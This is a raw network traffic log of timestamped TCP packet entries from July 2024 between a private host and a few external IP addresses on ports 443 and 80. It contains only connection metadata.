Jul 26, 2024 12:57:23.320851088 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.320861101 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.320902109 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.320930958 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.357724905 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.357788086 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.357901096 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.357965946 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.358062029 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.358062029 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.366306067 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.366429090 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.366441965 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.366456032 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.366503000 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.366525888 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.372862101 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.372904062 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.372961998 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.372975111 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.373018980 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.373038054 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.376333952 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.376382113 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.376441956 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.376451969 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.376490116 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.376506090 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.388792992 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.388837099 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.388901949 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.388915062 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.389178991 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.389179945 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.395095110 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.395138979 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.395179033 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.395216942 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.395251989 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.395322084 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.409784079 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.409835100 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.410024881 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.410024881 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.410094976 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.410162926 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.411948919 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.412007093 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.412046909 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.412060022 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.412096977 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.412126064 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.448344946 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.448395967 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.448466063 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.448534966 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.448663950 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.448663950 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.457025051 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.457124949 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.457129002 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.457176924 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.457202911 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.457242012 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.464967966 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.465012074 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.465074062 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.465087891 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.465116024 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.465141058 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.467178106 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.467238903 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.467269897 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.467282057 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.467308044 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.467331886 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.480732918 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.480784893 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.480828047 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.480839968 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.480879068 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.480897903 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.485841036 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.485882044 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.486044884 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.486044884 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.486113071 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.486186028 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.500663996 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.500708103 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.500757933 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.500777960 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.500916958 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.500916958 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.502963066 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.503007889 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.503056049 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.503066063 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.503099918 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.503127098 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.544725895 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.544754982 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.545078993 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.545140982 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.545217037 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.548134089 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.548171043 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.548228979 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.548243999 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.548276901 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.548305035 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.554302931 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.554331064 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.554389954 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.554402113 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.554440975 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.554461002 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.558577061 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.558614969 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.558672905 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.558685064 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.558716059 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.558751106 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.572196960 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.572232008 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.572309017 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.572321892 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.572345972 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.572371006 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.574168921 CEST	80	60799	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:23.574253082 CEST	60799	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:23.577545881 CEST	60799	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:23.578217030 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.578248978 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.578311920 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.578324080 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.578365088 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.578389883 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.582593918 CEST	80	60799	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:23.592386007 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.592425108 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.592596054 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.592667103 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.592782021 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.593558073 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.593588114 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.593652964 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.593668938 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.593700886 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.593723059 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.630320072 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.630348921 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.630635977 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.630671978 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.630836010 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.639481068 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.639508963 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.639576912 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.639591932 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.639622927 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.639659882 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.645768881 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.645803928 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.645864010 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.645876884 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.645905972 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.645947933 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.648597002 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.648626089 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.648679018 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.648690939 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.648724079 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.648758888 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.663105965 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.663135052 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.663214922 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.663229942 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.663386106 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.663386106 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.669147968 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.669184923 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.669241905 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.669253111 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.669280052 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.669302940 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.688220024 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.688258886 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.688438892 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.688438892 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.688505888 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.688572884 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.690212011 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.690232992 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.690314054 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.690331936 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.690390110 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.720956087 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.720988035 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.721324921 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.721388102 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.721472025 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.730407000 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.730441093 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.730545044 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.730564117 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.730622053 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.732920885 CEST	60800	443	192.168.2.6	104.21.72.79
Jul 26, 2024 12:57:23.732981920 CEST	443	60800	104.21.72.79	192.168.2.6
Jul 26, 2024 12:57:23.733072996 CEST	60800	443	192.168.2.6	104.21.72.79
Jul 26, 2024 12:57:23.734402895 CEST	60800	443	192.168.2.6	104.21.72.79
Jul 26, 2024 12:57:23.734431982 CEST	443	60800	104.21.72.79	192.168.2.6
Jul 26, 2024 12:57:23.736730099 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.736751080 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.736849070 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.736865997 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.736924887 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.740288019 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.740314960 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.740405083 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.740422964 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.740499020 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.754906893 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.754937887 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.755037069 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.755053997 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.755112886 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.759737015 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.759767056 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.759859085 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.759874105 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.759929895 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.779093027 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.779138088 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.779247046 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.779269934 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.779325008 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.779346943 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.780776978 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.780803919 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.782053947 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.782069921 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.782131910 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.812796116 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.812824011 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.812911034 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.812935114 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.812993050 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.821142912 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.821238995 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.821278095 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.821357965 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.828406096 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.828430891 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.828493118 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.828507900 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.828533888 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.828563929 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.829962015 CEST	80	60799	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:23.830123901 CEST	60799	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:23.830382109 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.830404997 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.830492973 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.830506086 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.830557108 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.845170021 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.845187902 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.845264912 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.845278025 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.845335007 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.851752996 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.851772070 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.851844072 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.851856947 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.851986885 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.879245043 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.879261971 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.879587889 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.879652023 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.879734993 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.880691051 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.880705118 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.880779982 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.880796909 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.880853891 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.908698082 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.908725023 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.908931971 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.908967018 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.909029007 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.912158966 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.912178993 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.912250996 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.912257910 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.912301064 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.918323994 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.918343067 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.918411016 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.918417931 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.918456078 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.921690941 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.921710968 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.921870947 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.921875954 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.921917915 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.944776058 CEST	60799	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:23.945296049 CEST	60802	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:23.950408936 CEST	80	60802	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:23.950485945 CEST	60802	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:23.950633049 CEST	60802	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:23.959629059 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.959656000 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.959850073 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.959913969 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.959975004 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.961860895 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.961878061 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.961946011 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.961960077 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.962013960 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.963361025 CEST	80	60799	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:23.963371992 CEST	80	60802	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:23.963424921 CEST	60799	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:23.983685970 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.983709097 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.983872890 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.983872890 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.983937025 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.984004021 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.984592915 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.984613895 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.984669924 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.984683037 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.984778881 CEST	60798	443	192.168.2.6	5.75.212.60
